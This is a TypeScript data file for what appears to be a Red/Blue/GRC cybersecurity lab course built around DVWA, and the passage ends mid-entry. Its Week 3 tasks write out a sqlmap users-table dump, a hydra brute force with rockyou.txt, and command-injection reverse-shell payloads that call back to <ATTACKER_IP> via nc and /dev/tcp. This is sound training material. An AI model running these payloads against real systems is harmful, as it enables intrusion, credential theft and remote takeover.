import { Task, Week, Gate } from './types';

// Week Metadata
export const WEEKS: Record<number, Week> = {
  0: {
    number: 0,
    title: 'Lab Setup & Rules of Engagement',
    theme: 'Stand up your environment and agree the rules before any testing',
    objective: 'Get your tools running, reach your targets, and confirm authorized scope',
    runs: 'Run 00'
  },
  1: {
    number: 1,
    title: 'Cold Recon',
    theme: 'Build, connect, passive recon, baseline hardening',
    objective: 'Establish baseline, passive reconnaissance, and foundational security controls',
    runs: 'Run 01'
  },
  2: {
    number: 2,
    title: 'Hard Target',
    theme: 'Authorized vulnerability assessment + SOC detection engineering',
    objective: 'Perform vulnerability discovery and detection engineering',
    runs: 'Run 02'
  },
  3: {
    number: 3,
    title: 'The Breach',
    theme: 'Attack, detect, investigate, preserve evidence',
    objective: 'Execute authorized attacks and investigate findings',
    runs: 'Run 03'
  },
  4: {
    number: 4,
    title: 'Payday',
    theme: 'Report and present findings',
    objective: 'Compile and present final findings and recommendations',
    runs: 'Run 04'
  }
};

// Gates
export const GATES: Gate[] = [
  {
    id: 1,
    week: 1,
    title: 'Gate 1',
    description: 'Case + Scope authored',
    requiredArtifactTypes: ['case_overview', 'scope_document'],
    requiredTasks: ['red-w1-osint', 'blue-w1-hardening', 'grc-w1-framework'],
    handoffs: [
      { from: 'grc', to: 'red', artifact: 'Rules_of_Engagement.md', label: 'Confirm authorized scope before any scanning' },
      { from: 'grc', to: 'blue', artifact: 'Hardening_Standard.md', label: 'Issue the hardening standard Blue implements' },
      { from: 'red', to: 'grc', artifact: 'Recon_Findings.md', label: 'Hand recon to GRC for the asset inventory' },
      { from: 'blue', to: 'grc', artifact: 'Hardening_Checklist.txt', label: 'Report what was hardened for the policy baseline' },
    ],
  },
  {
    id: 2,
    week: 2,
    title: 'Gate 2',
    description: 'Hardening + Logs in place',
    requiredArtifactTypes: ['hardening_checklist', 'baseline_logs'],
    requiredTasks: ['blue-w2-baseline', 'red-w2-enumeration', 'grc-w2-risk'],
    handoffs: [
      { from: 'grc', to: 'blue', artifact: 'VM_SOP.md', label: 'Issue the vulnerability-management SOP Blue follows' },
      { from: 'red', to: 'grc', artifact: 'Vulnerability_Summary.md', label: 'Hand findings to GRC for risk scoring' },
      { from: 'blue', to: 'grc', artifact: 'Detection_Rules.txt', label: 'Report the detections now in place' },
    ],
  },
  {
    id: 3,
    week: 3,
    title: 'Gate 3',
    description: 'Findings + Evidence complete',
    requiredArtifactTypes: ['pcap', 'findings', 'evidence_log'],
    requiredTasks: ['red-w3-attacks', 'blue-w3-detection', 'grc-w3-custody'],
    handoffs: [
      { from: 'grc', to: 'blue', artifact: 'IR_Runbook.md', label: 'Issue the incident-response runbook Blue follows during the breach' },
      { from: 'red', to: 'grc', artifact: 'Evidence_Photos.zip', label: 'Submit attack evidence for chain of custody' },
      { from: 'blue', to: 'grc', artifact: 'Incident_Response.txt', label: 'Submit IR notes and logs for custody' },
    ],
  }
];

// RED (Runners) Tasks
const RED_TASKS: Task[] = [
  {
    id: 'red-w0-setup',
    role: 'red',
    week: 0,
    title: 'Get Kali Ready & Confirm Scope',
    objective: 'Boot your Kali attack box, reach your company target, and confirm what you are authorized to test.',
    frameworks: ['NIST_CSF'],
    deliverables: [],
    learn: ['Booting and updating Kali Linux', 'Verifying network reach to a target', 'Reading the Rules of Engagement (authorized scope)'],
    tools: ['Kali Linux', 'ip / ping', 'apt'],
    prerequisites: ['Your company target IP (from the instructor)', "GRC's Rules_of_Engagement.md once issued", 'The DVWA web target is stood up by Blue in Week 0 (http://<UBUNTU_IP>/)'],
    definitionOfDone: ['Kali boots and is fully updated', 'You can ping your company target', 'You have read and understood the authorized scope'],
    handoff: [{ to: 'grc', note: 'Acknowledge the Rules of Engagement so GRC knows scope is understood.' }],
    steps: [
      {
        id: 'red-w0-s1',
        title: 'Boot & Update Kali',
        description: 'Boot your Kali VM and refresh then upgrade all packages.',
        instruction: 'Start the Kali VM, open a terminal, and run the update command.',
        commands: [
          { cmd: 'sudo apt update', explain: 'Refresh the package list so you install the newest versions.' },
          { cmd: 'sudo apt -y upgrade', explain: 'Install all available updates (-y auto-confirms).' },
        ],
        expectedOutput: 'Packages refreshed and upgraded',
        outputExplanation: 'A clean prompt with no errors means your tools are current; a long "upgraded, newly installed" summary is normal the first run.',
        whatItMeans: 'Your attack tools are patched and current before you begin.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'If apt reports a lock error, another update is running — wait a minute and retry, or reboot the VM.',
      },
      {
        id: 'red-w0-s2',
        title: 'Verify You Can Reach Your Target',
        description: 'Ping your assigned company host to confirm it is reachable.',
        instruction: 'Replace the placeholder with your target IP and run the ping.',
        commands: [
          {
            cmd: 'ping -c 2 <YOUR_TARGET_IP>',
            explain: 'Send two small test packets to your target and wait for replies. Replace <YOUR_TARGET_IP> with your target’s address (or set it in the Lab access panel and it fills in automatically).',
            flags: [
              { flag: 'ping', meaning: 'Checks whether another computer is reachable on the network.' },
              { flag: '-c 2', meaning: 'Send only 2 packets then stop (without -c, ping runs forever — press Ctrl+C to stop).' },
              { flag: '<YOUR_TARGET_IP>', meaning: 'The address to test, e.g. 10.10.10.5.' },
            ],
          },
        ],
        expectedOutput: '2 packets transmitted, 2 received, 0% packet loss',
        outputExplanation: 'Low-time replies mean reachable; "Destination host unreachable" or 100% loss is a network problem to fix before scanning.',
        whatItMeans: 'You have a live network path to the box you are authorized to test.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'No reply? Check your VM network adapter is on the lab network (as the instructor specified) and the target is powered on.',
      },
      {
        id: 'red-w0-s3',
        title: 'Confirm Authorized Scope',
        description: 'Confirm what you are authorized to test.',
        instruction: 'Read the Rules of Engagement from GRC and confirm your authorized target(s) before any scanning.',
        whatItMeans: 'You attack only your own target, within the approved window.',
        frameworks: ['NIST_CSF'],
      },
    ],
  },
  {
    id: 'red-w1-osint',
    role: 'red',
    week: 1,
    title: 'OSINT & Passive Recon',
    objective: 'Gather open-source intelligence and passively fingerprint the target to build an asset list.',
    frameworks: ['NIST_CSF'],
    deliverables: ['Recon_Findings.md'],
    prerequisites: ['Setup_Notes_Red.md (Week 0: Kali ready, target reachable)', "GRC's Rules_of_Engagement.md (authorized scope)"],
    definitionOfDone: ['Assets and services identified', 'Recon_Findings.md and Asset_List.md saved to ~/team-artifacts/week-1/'],
    handoff: [{ to: 'grc', artifact: 'Asset_List.md + Recon_Findings.md', note: 'Feed recon into the asset inventory and risk mapping.' }],
    learn: ['OSINT & passive recon', 'DNS / WHOIS enumeration', 'Fingerprinting web tech with Kali'],
    tools: ['whois / dig', 'whatweb', 'theHarvester'],
    steps: [
      {
        id: 'red-w1-s1',
        title: 'Verify Connectivity',
        description: 'List your own IP and ping the target to confirm you share a subnet.',
        instruction: 'Run the command and note your eth0 address and the ping reply.',
        commands: [
          { cmd: 'ip a', explain: 'List your network interfaces and IP addresses.' },
          { cmd: 'ping -c 1 10.10.10.1', explain: 'Send one packet to the target to confirm it answers.' },
        ],
        commandExplanation: '`ip a` lists every network interface and its assigned address; `ping -c 1` sends a single ICMP echo (the `-c 1` caps it at one packet) to confirm the target answers.',
        commandFlags: [
          { flag: 'ip a', meaning: 'Show all network interfaces and their IP addresses.' },
          { flag: 'ping', meaning: 'Send ICMP echo requests to test reachability.' },
          { flag: '-c 1', meaning: 'Stop after 1 packet instead of pinging forever.' },
          { flag: '10.10.10.1', meaning: 'The host being pinged (the gateway/target).' },
        ],
        expectedOutput: 'eth0 inet 10.10.10.x, ping reply from target',
        outputExplanation: 'The `eth0` `inet` line in the 10.10.10.x range is your IP, and a "1 received, 0% packet loss" line proves the target answers.',
        whatItMeans: 'Your Kali box and the target sit on the same subnet, so scanning will work.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'No ping reply? Confirm the target VM is on and on the same lab network, and that .1 is your gateway (yours may differ — use the address from Lab access). "Network is unreachable"? Your Kali NIC may be on the wrong adapter — check ip a shows a 10.10.10.x address.',
      },
      {
        id: 'red-w1-s2',
        title: 'WHOIS & DNS Enumeration',
        description: 'Query registration and DNS records to map the target domain.',
        instruction: 'Run the WHOIS and DNS lookups and note the registrar, name servers, and mail servers.',
        commands: [
          { cmd: 'whois target.local', explain: 'Query domain registration / ownership records.' },
          { cmd: 'dig ANY target.local', explain: 'Ask DNS for every record type for the domain.' },
          { cmd: 'nslookup -type=mx target.local', explain: 'Look up only mail-exchanger (mail server) records.' },
        ],
        commandExplanation: '`whois` pulls registration/ownership records; `dig ANY` asks DNS for every record type at once; `nslookup -type=mx` narrows the query to just mail-exchanger records.',
        commandFlags: [
          { flag: 'whois', meaning: 'Query domain registration / ownership records.' },
          { flag: 'dig ANY', meaning: 'Ask DNS for every record type for the domain.' },
          { flag: 'nslookup -type=mx', meaning: 'Look up only mail-exchanger (mail server) records.' },
        ],
        expectedOutput: 'Domain info, A/MX/NS records',
        outputExplanation: 'The `whois` block shows the registrar and contacts; `dig` lists A, NS and MX records, with the MX names revealing where the target receives email.',
        whatItMeans: 'You now know the target owner, mail servers, and DNS structure.',
        frameworks: ['NIST_CSF', 'CIS'],
        troubleshooting: 'No records / "connection timed out; no servers could be reached"? The lab domain may not resolve on your DNS — point dig at the lab DNS server (dig @<UBUNTU_IP> ANY target.local) or use the target IP directly. whois may return nothing for a private lab domain — that is expected.',
      },
      {
        id: 'red-w1-s3',
        title: 'Web Tech Discovery',
        description: 'Fingerprint the target web stack and save the results to Recon_Findings.md.',
        instruction: 'Run whatweb and tee its output into the canonical recon file.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-1', explain: 'Create the week-1 artifacts folder (no error if it exists).' },
          { cmd: 'whatweb http://10.10.10.x | tee ~/team-artifacts/week-1/Recon_Findings.md', explain: 'Fingerprint the web stack and save the output to your recon file.' },
        ],
        commandExplanation: '`whatweb` fingerprints the server, language and frameworks behind the URL, and `tee` both prints them and saves them to Recon_Findings.md.',
        commandFlags: [
          { flag: 'whatweb', meaning: 'Fingerprint a website’s server, language and frameworks.' },
          { flag: 'http://10.10.10.x', meaning: 'The target URL to fingerprint.' },
        ],
        expectedOutput: 'Detected technologies printed and saved to Recon_Findings.md',
        outputExplanation: 'Each `[name version]` tag is a detected technology; record exact versions (e.g. Apache 2.4.x, PHP 5.x) because old versions map to known CVEs.',
        whatItMeans: 'You have a saved record of the exact software versions that may be exploitable.',
        frameworks: ['CIS', 'OWASP'],
        producesDeliverable: 'Recon_Findings.md',
        isEvidenceStep: true,
        troubleshooting: '"whatweb: command not found"? Install it: sudo apt install whatweb. No output? Use the full URL with http:// and confirm the site loads in a browser first.',
      },
      {
        id: 'red-w1-s4',
        title: 'Email/Host Discovery',
        description: 'Harvest emails, subdomains, and hosts for the target domain.',
        instruction: 'Run theHarvester against the target domain and note candidate usernames and subdomains.',
        commands: [
          {
            cmd: 'theHarvester -d target.local -b all',
            explain: 'Gather public info (emails, subdomains, hosts) about the domain from many sources at once.',
            flags: [
              { flag: 'theHarvester', meaning: 'An OSINT tool that collects domain intelligence.' },
              { flag: '-d target.local', meaning: 'The domain to gather information about.' },
              { flag: '-b all', meaning: 'Use every available data source (search engines, certs, etc.).' },
            ],
          },
        ],
        expectedOutput: 'Email list, subdomains, hosts',
        outputExplanation: 'Results are grouped into emails, hosts and subdomains — the email addresses become candidate usernames and the subdomains reveal extra attack surface.',
        whatItMeans: 'You have candidate usernames and additional infrastructure to target.',
        frameworks: ['NIST_CSF'],
        troubleshooting: '"command not found"? sudo apt install theharvester. A single source erroring or rate-limiting is normal — try one source instead of all, e.g. -b bing. In an offline lab most public sources return nothing; that is expected.',
      },
      {
        id: 'red-w1-s5',
        title: 'Export to Asset List',
        description: 'Hand your discovered assets to GRC.',
        instruction: 'List the hosts and services you found and give them to GRC — they enter them into the Asset Inventory form.',
        whatItMeans: 'Your recon becomes the team asset inventory.',
        frameworks: ['NIST_CSF'],
      }
    ]
  },
  {
    id: 'red-w2-enumeration',
    role: 'red',
    week: 2,
    title: 'Vulnerability Discovery',
    objective: 'Perform authorized vulnerability enumeration using network and web scanning.',
    frameworks: ['NIST_CSF', 'CIS', 'OWASP'],
    deliverables: ['Nmap_Scan.txt', 'Nikto_Report.txt'],
    prerequisites: ['Week 1 asset list', 'Scope still valid (Rules of Engagement)'],
    definitionOfDone: ['All ports & web vulnerabilities enumerated', 'Vulnerability_Summary.md written for GRC'],
    handoff: [{ to: 'grc', artifact: 'Vulnerability_Summary.md', note: 'Hand findings to GRC for risk scoring.' }],
    learn: ['Port & service scanning with nmap', 'Web scanning with nikto', 'Summarizing vulnerabilities'],
    tools: ['nmap', 'nikto'],
    steps: [
      {
        id: 'red-w2-s1',
        title: 'Network Scan - All Ports',
        description: 'Scan all TCP ports with version detection.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-2', explain: 'Make the week-2 folder to save your scan into. -p means "create parents and don’t error if it already exists".' },
          {
            cmd: 'nmap -sV -p- 10.10.10.X > ~/team-artifacts/week-2/Nmap_Scan.txt',
            explain: 'Scan every port on the target and save the results. Replace 10.10.10.X with your target IP (or set it once in the Lab access panel and it auto-fills).',
            flags: [
              { flag: 'nmap', meaning: 'The network port-scanner tool.' },
              { flag: '-sV', meaning: 'Probe each open port to identify the service and its version.' },
              { flag: '-p-', meaning: 'Scan all 65,535 ports, not just the common ones.' },
              { flag: '> …Nmap_Scan.txt', meaning: 'Write the output to a file (> means "save to"; it overwrites).' },
            ],
          },
        ],
        expectedOutput: 'Port list with service versions',
        outputExplanation: 'Each row shows PORT, STATE, SERVICE and VERSION — focus on `open` ports and their version strings, which are your candidate entry points.',
        whatItMeans: 'Discovers all listening network services and their versions.',
        frameworks: ['CIS'],
        producesDeliverable: 'Nmap_Scan.txt',
        isEvidenceStep: true,
        troubleshooting: '"Host seems down"? Add -Pn to skip the ping check. No open ports or a hang? Confirm the target is up (ping it) and that you used the right IP from Lab access. An all-port scan is slow — give it a minute.',
      },
      {
        id: 'red-w2-s2',
        title: 'Web Vulnerability Scan',
        description: 'Run automated web scanner against target.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-2', explain: 'Make the week-2 folder to save your report into (safe to run again).' },
          {
            cmd: 'nikto -h http://10.10.10.X -o ~/team-artifacts/week-2/Nikto_Report.txt',
            explain: 'Scan the target web server for known issues and misconfigurations, saving the report to a file.',
            flags: [
              { flag: 'nikto', meaning: 'An automated web-server vulnerability scanner.' },
              { flag: '-h http://10.10.10.X', meaning: 'The host (URL) to scan.' },
              { flag: '-o …Nikto_Report.txt', meaning: 'Write the findings to this report file (-o = output).' },
            ],
          },
        ],
        expectedOutput: 'Vulnerabilities: directory indexing, default files, old software',
        outputExplanation: 'Lines beginning with `+` are findings — outdated software, exposed directories, or dangerous default files. Each usually cites an OSVDB/CVE reference to research.',
        whatItMeans: 'Identifies common web misconfigurations and known web vulnerabilities.',
        frameworks: ['OWASP'],
        producesDeliverable: 'Nikto_Report.txt',
        isEvidenceStep: true,
        troubleshooting: '"0 host(s) tested" or connection error? The web server isn\'t reachable — open http://<target>/ in a browser first, check the IP, and make sure DVWA/Apache is running. Use the full URL including http://.',
      },
      {
        id: 'red-w2-s3',
        title: 'SSH Auth Methods',
        description: 'Identify authentication methods on SSH.',
        commands: [
          {
            cmd: 'nmap --script ssh-auth-methods 10.10.10.X',
            explain: 'Ask the SSH server which login methods it accepts (password vs key).',
            flags: [
              { flag: 'nmap', meaning: 'The scanner (also runs helper scripts).' },
              { flag: '--script ssh-auth-methods', meaning: 'Run the NSE script that lists accepted SSH auth methods.' },
              { flag: '10.10.10.X', meaning: 'The SSH host to query — your target IP.' },
            ],
          },
        ],
        expectedOutput: 'SSH allows password auth',
        outputExplanation: 'The script lists supported methods; seeing `password` means logins can be brute-forced, whereas `publickey` only would be far safer.',
        whatItMeans: 'Password auth enabled = brute force risk; SSH key only would be better.',
        frameworks: ['CIS'],
        troubleshooting: '"Host seems down"? Add -Pn. No SSH result? Confirm port 22 is open (from the earlier nmap scan) and the target is reachable. "Failed to resolve"? Use the numeric IP, not a hostname.',
      },
      {
        id: 'red-w2-s4',
        title: 'Summarize Vulnerabilities for GRC',
        description: 'Summarize your scan findings for the report.',
        instruction: 'Write up your nmap and nikto findings in the Penetration Test Report form — it builds the report for you.',
        whatItMeans: 'GRC gets a clean, ranked list to risk-score instead of raw scan dumps.',
        frameworks: ['NIST_CSF'],
        usesForm: 'Penetration Test Report',
      }
    ]
  },
  {
    id: 'red-w3-attacks',
    role: 'red',
    week: 3,
    title: 'Authorized Attacks & Evidence',
    objective: 'Execute one well-documented exploit chain with complete evidence trail.',
    frameworks: ['OWASP', 'NIST_800_61', 'CVSS'],
    deliverables: ['SQL_Injection_Proof.txt', 'Brute_Force_Proof.txt', 'Reverse_Shell_Proof.txt', 'Evidence_Photos.zip'],
    prerequisites: ['Confirmed vulnerabilities from Week 2', 'Rules of Engagement (stay in scope)'],
    definitionOfDone: ['One full exploit chain proven with evidence', 'All *_Proof.txt + Evidence_Photos.zip saved'],
    handoff: [{ to: 'grc', artifact: 'Evidence_Photos.zip', note: 'Submit attack evidence for chain of custody.' }],
    learn: ['Exploiting SQL injection', 'Brute-forcing authentication', 'Command injection & reverse shells', 'Capturing court-ready evidence'],
    tools: ['sqlmap / Burp', 'hydra', 'netcat'],
    steps: [
      {
        id: 'red-w3-s1',
        title: 'SQL Injection Attack',
        description: 'Dump the DVWA users table through the SQL-injection page.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-3', explain: 'Make the week-3 folder to save your proof into (safe to run again).' },
          {
            cmd: 'sudo sqlmap -u "http://<YOUR_TARGET_IP>:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --auth-type=BASIC --auth-creds=admin:password -D dvwa -T users --dump | tee ~/team-artifacts/week-3/SQL_Injection_Proof.txt',
            explain: 'Point sqlmap at the injectable id parameter on the DVWA SQLi page and dump the users table — usernames and password hashes — while saving everything to a proof file.',
            flags: [
              { flag: 'sqlmap', meaning: 'Automates finding and exploiting SQL injection.' },
              { flag: '-u "…/sqli/?id=1&Submit=Submit"', meaning: 'The exact URL to test — the injectable id parameter on the SQLi page.' },
              { flag: '--auth-type=BASIC', meaning: 'The app is behind HTTP Basic auth — authenticate that way first.' },
              { flag: '--auth-creds=admin:password', meaning: 'The Basic-auth username:password.' },
              { flag: '-D dvwa', meaning: 'Target the dvwa database.' },
              { flag: '-T users', meaning: 'Target the users table inside it.' },
              { flag: '--dump', meaning: 'Extract (dump) the rows of that table.' },
              { flag: '| tee …SQL_Injection_Proof.txt', meaning: 'Show output on screen AND save a copy to the file (tee does both).' },
            ],
          },
        ],
        expectedOutput: 'The dvwa.users table dumped — admin, gordonb, … with their password hashes.',
        outputExplanation: 'sqlmap confirms the id parameter is injectable, then prints the users table with each password hash — hard proof that unsanitized input let you read the database.',
        whatItMeans: 'Demonstrates data exfiltration risk from SQL injection.',
        frameworks: ['OWASP'],
        producesDeliverable: 'SQL_Injection_Proof.txt',
        isEvidenceStep: true,
        verify: ['users'],
        troubleshooting: '"unable to connect" — check <YOUR_TARGET_IP> and that DVWA is up on :8080. "not injectable"? Set DVWA Security to Low and confirm --auth-type=BASIC --auth-creds=admin:password. If it asks about a redirect or CSRF token, answer Y to continue.',
      },
      {
        id: 'red-w3-s2',
        title: 'Brute Force Attack',
        description: 'Guess the login password with hydra against the DVWA login form.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-3', explain: 'Make the week-3 folder to save your proof into (safe to run again).' },
          {
            cmd: 'sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt <YOUR_TARGET_IP> http-post-form "/login.php:username=^USER^&password=^PASS^:Login failed" -s 8080 -t 2 -V | tee ~/team-artifacts/week-3/Brute_Force_Proof.txt',
            explain: 'Try many passwords for the admin user against the login form. The quoted string tells hydra the path, where to put the username/password, and the text that means the login FAILED (so it keeps going until that text is gone).',
            flags: [
              { flag: 'hydra', meaning: 'Tries many login guesses quickly.' },
              { flag: '-l admin', meaning: 'The single username to try (lowercase L = one login name).' },
              { flag: '-P …/rockyou.txt', meaning: 'The password list to try, one per line (uppercase P = list).' },
              { flag: '<YOUR_TARGET_IP>', meaning: 'The target host, given on its own before the service.' },
              { flag: 'http-post-form "…"', meaning: 'Attack a form sent by HTTP POST, described by the quoted string (path : body : fail-text).' },
              { flag: '^USER^ / ^PASS^', meaning: 'Placeholders hydra swaps in for each username/password guess.' },
              { flag: ':Login failed', meaning: 'The text shown on a FAILED login — hydra stops when it no longer appears (F = failure marker).' },
              { flag: '-s 8080', meaning: 'The port DVWA runs on.' },
              { flag: '-t 2', meaning: 'Only 2 parallel attempts — DVWA is flaky under load.' },
              { flag: '-V', meaning: 'Verbose — show every attempt.' },
            ],
          },
        ],
        expectedOutput: 'A "login: admin password: <found>" line once a guess works.',
        outputExplanation: 'A green [8080][http-post-form] host login: admin password: <found> line means hydra guessed a valid password — evidence of a weak credential and no account lockout.',
        whatItMeans: 'Shows weak password vulnerability and lack of account lockout.',
        frameworks: ['CIS', 'OWASP'],
        producesDeliverable: 'Brute_Force_Proof.txt',
        isEvidenceStep: true,
        verify: ['login: admin'],
        troubleshooting: 'rockyou.txt "No such file"? It ships gzipped — run once: sudo gunzip /usr/share/wordlists/rockyou.txt.gz. Never finds a password? The failure text or field names may differ — open the login page, submit a wrong password, and match the exact "Login failed" text and the username/password field names.',
      },
      {
        id: 'red-w3-s3',
        title: 'Command Injection & Reverse Shell',
        description: 'Catch a shell from the target using a command-injection payload.',
        instruction: 'Two machines. First start the listener on YOUR Kali, then submit a payload in the vulnerable web input (e.g. DVWA Command Injection). When the shell lands, run id and save its output plus your notes to ~/team-artifacts/week-3/Reverse_Shell_Proof.txt.',
        commands: [
          { cmd: 'mkdir -p ~/team-artifacts/week-3', explain: 'Make the week-3 folder to save your proof into (safe to run again).' },
          {
            cmd: 'nc -lvnp 4444',
            explain: 'On YOUR Kali: start a listener and wait for the target to connect back. Leave this running in its own terminal.',
            flags: [
              { flag: 'nc', meaning: 'Netcat — raw TCP connections.' },
              { flag: '-l', meaning: 'Listen mode (wait for a connection).' },
              { flag: '-v', meaning: 'Verbose — print when someone connects.' },
              { flag: '-n', meaning: 'No DNS lookups (use raw IPs).' },
              { flag: '-p 4444', meaning: 'Listen on port 4444.' },
            ],
          },
          {
            cmd: '127.0.0.1; mkfifo /tmp/f; nc <ATTACKER_IP> 4444 < /tmp/f | /bin/bash > /tmp/f',
            explain: 'Paste this into the vulnerable WEB input (not your terminal). The 127.0.0.1 satisfies the field, then ; runs your command: a named pipe wires /bin/bash to a connection back to your Kali listener.',
            flags: [
              { flag: '127.0.0.1;', meaning: 'Satisfies the intended field, then ; starts your injected command.' },
              { flag: 'mkfifo /tmp/f', meaning: 'Create a named pipe used to shuttle data both ways.' },
              { flag: 'nc <ATTACKER_IP> 4444', meaning: 'Connect back to YOUR Kali IP on port 4444.' },
              { flag: '| /bin/bash > /tmp/f', meaning: 'Feed what you type into a shell and send its output back down the pipe.' },
            ],
          },
          {
            cmd: '127.0.0.1; bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1',
            explain: 'Fallback payload if nc or mkfifo is not available: the bash built-in /dev/tcp opens the connection back to your listener. Paste into the same web input.',
            flags: [
              { flag: 'bash -i', meaning: 'Start an interactive bash shell.' },
              { flag: '>& /dev/tcp/<ATTACKER_IP>/4444', meaning: 'Redirect it over a TCP connection to your Kali on port 4444.' },
              { flag: '0>&1', meaning: 'Wire input and output together so the shell is usable.' },
            ],
          },
        ],
        expectedOutput: 'The listener prints a connection from the target; running id returns uid=33(www-data).',
        outputExplanation: 'When the payload runs, your nc -lvnp 4444 window shows "connect to … from …" and drops you at a shell. id returning uid=33(www-data) confirms remote code execution as the web-server user.',
        whatItMeans: 'Demonstrates RCE and full system compromise.',
        frameworks: ['OWASP'],
        producesDeliverable: 'Reverse_Shell_Proof.txt',
        isEvidenceStep: true,
        verify: ['uid='],
        troubleshooting: 'No shell? Put YOUR Kali IP in <ATTACKER_IP> (not 127.0.0.1), keep the listener running, and make sure port 4444 is free ("Address already in use" → another listener is running; find it with jobs, stop with kill %1). If mkfifo fails, use the bash /dev/tcp fallback. Confirm the web field actually runs commands (the ; injection) and that the target can reach your Kali.',
      },
      {
        id: 'red-w3-s4',
        title: 'Screenshot Evidence',
        description: 'Capture proof of successful exploitation.',
        instruction: 'For each exploit, take a screenshot and save it as YYYYMMDD_TeamXX_Tool_Action.png (e.g. 20260624_Team01_sqlmap_dbdump.png) in ~/team-artifacts/week-3/ — dated, attributed, and self-describing. Then bundle them: zip ~/team-artifacts/week-3/Evidence_Photos.zip ~/team-artifacts/week-3/*.png',
        expectedOutput: 'Correctly-named PNGs in your Evidence folder, zipped into Evidence_Photos.zip',
        outputExplanation: 'Each filename should read date_team_tool_action.png so anyone can tell what it proves without opening it; the zip is the bundle you hand to GRC.',
        whatItMeans: 'Documented proof required by GRC for compliance and reporting. Attach these to the Penetration Test Report form.',
        frameworks: ['NIST_800_61'],
        usesForm: 'Penetration Test Report',
        producesDeliverable: 'Evidence_Photos.zip',
        isEvidenceStep: true,
        troubleshooting: 'Screenshot tool on Kali: use the PrintScreen key or run flameshot gui (sudo apt install flameshot). Name mismatch warnings later? Match the pattern exactly: 8-digit date, Team then two digits, then Tool and Action, .png.',
      }
    ]
  },
  {
    id: 'red-w4-briefing',
    role: 'red',
    week: 4,
    title: 'Technical Findings Briefing',
    objective: 'Present technical exploits and findings in plain English to stakeholders.',
    frameworks: ['ISO_27001', 'NIST_CSF'],
    deliverables: [],
    prerequisites: ['All Week 3 evidence', "GRC's Findings.md"],
    definitionOfDone: ['Plain-English explanation written', 'Your briefing slides drafted'],
    handoff: [{ to: 'grc', artifact: 'Technical_Explanation.md', note: 'Feed the technical narrative into the final report.' }],
    learn: ['Explaining exploits to non-technical stakeholders', 'Building a findings briefing'],
    tools: ['Markdown', 'Slides'],
    steps: [
      {
        id: 'red-w4-s1',
        title: 'Review Attack Timeline',
        description: 'Prepare chronological attack narrative.',
        command: 'cat timeline.txt',
        commandExplanation: '`cat` prints the contents of `timeline.txt` to the screen so you can review the attack chronology you recorded.',
        commandFlags: [
          { flag: 'cat', meaning: 'Print a file’s contents to the screen.' },
          { flag: 'timeline.txt', meaning: 'The file holding your recorded attack events.' },
        ],
        expectedOutput: 'Clear sequence of events',
        outputExplanation: 'You should see your timestamped events in order; gaps or out-of-order entries are your cue to tidy the narrative before briefing.',
        whatItMeans: 'Tells the story of how the compromise occurred.',
        frameworks: ['ISO_27001'],
        troubleshooting: '"cat: timeline.txt: No such file or directory"? You haven\'t created it yet — timeline.txt is your own notes; make it (e.g. nano ~/team-artifacts/week-3/timeline.txt) listing each action with a timestamp, then cat it. Run cat from the folder that holds the file, or give the full path.',
      },
      {
        id: 'red-w4-s2',
        title: 'Explain Each Finding',
        description: 'Explain each finding in plain English.',
        instruction: 'Explain each finding (impact and fix) in the Penetration Test Report form.',
        whatItMeans: 'Non-technical stakeholders understand the risk.',
        frameworks: ['ISO_27001'],
        usesForm: 'Penetration Test Report',
      },
      {
        id: 'red-w4-s3',
        title: 'Draft Your Briefing Slides',
        description: 'Prepare your briefing slides.',
        instruction: 'Build a few briefing slides from your Penetration Test Report — one beat per finding.',
        whatItMeans: 'Your half of the final briefing is ready to combine with Blue and GRC.',
        frameworks: ['ISO_27001'],
      }
    ]
  }
];

// BLUE (Wardens) Tasks
const BLUE_TASKS: Task[] = [
  {
    id: 'blue-w0-setup',
    role: 'blue',
    week: 0,
    title: 'Reach Your Targets & Stand Up DVWA',
    objective: 'Connect to both company servers, snapshot them, and run the DVWA web app (a Docker container) that Red will test.',
    frameworks: ['NIST_CSF'],
    deliverables: [],
    learn: ['Connecting to Linux (SSH) and Windows (RDP) hosts', 'Taking a baseline snapshot before any change', 'Running & managing a containerized web app with Docker (DVWA)'],
    tools: ['ssh', 'xfreerdp / Remote Desktop', 'VM snapshots', 'Docker'],
    prerequisites: ['Ubuntu and Windows target IPs + credentials (from your lab)', 'See "Lab requirements & setup" in the Guide to build the VMs first'],
    definitionOfDone: ['You can SSH into the Ubuntu target', 'You can RDP into the Windows target', 'A "pre-hardening" snapshot exists for both VMs', 'DVWA is running (container "dvwa") and reachable at http://<UBUNTU_IP>/', 'DVWA database created and Security set to Low (login admin / password)'],
    handoff: [
      { to: 'grc', note: 'Confirm both targets are reachable so GRC can finalize the hardening standard.' },
      { to: 'red', note: 'Tell Red the DVWA target URL (http://<UBUNTU_IP>/) once the container is up.' },
    ],
    steps: [
      {
        id: 'blue-w0-s1',
        title: 'SSH Into the Ubuntu Target',
        description: 'Open a remote shell on the Linux server you will harden.',
        command: 'ssh user@<UBUNTU_IP>',
        commandExplanation: '`ssh user@host` opens an encrypted remote shell on the Ubuntu server using the account the instructor gave you.',
        expectedOutput: 'A shell prompt on the Ubuntu host',
        outputExplanation: 'A changed prompt (e.g. `user@ubuntu:~$`) means you are now on the target, not your own machine.',
        whatItMeans: 'You can administer the Linux system you defend.',
        frameworks: ['NIST_CSF'],
        troubleshooting: 'Connection refused? Ensure the Ubuntu VM is up and SSH is running (`sudo systemctl status ssh`).',
      },
      {
        id: 'blue-w0-s2',
        title: 'RDP Into the Windows Target',
        description: 'Open a remote desktop on the Windows server you will harden.',
        command: 'xfreerdp /u:Administrator /v:<WINDOWS_IP>',
        commandExplanation: '`xfreerdp` is a Linux RDP client; `/u:` is the username and `/v:` is the Windows host to connect to.',
        expectedOutput: 'The Windows desktop appears',
        outputExplanation: 'Seeing the Windows desktop confirms Remote Desktop is enabled and reachable.',
        whatItMeans: 'You can administer the Windows system you defend.',
        frameworks: ['NIST_CSF'],
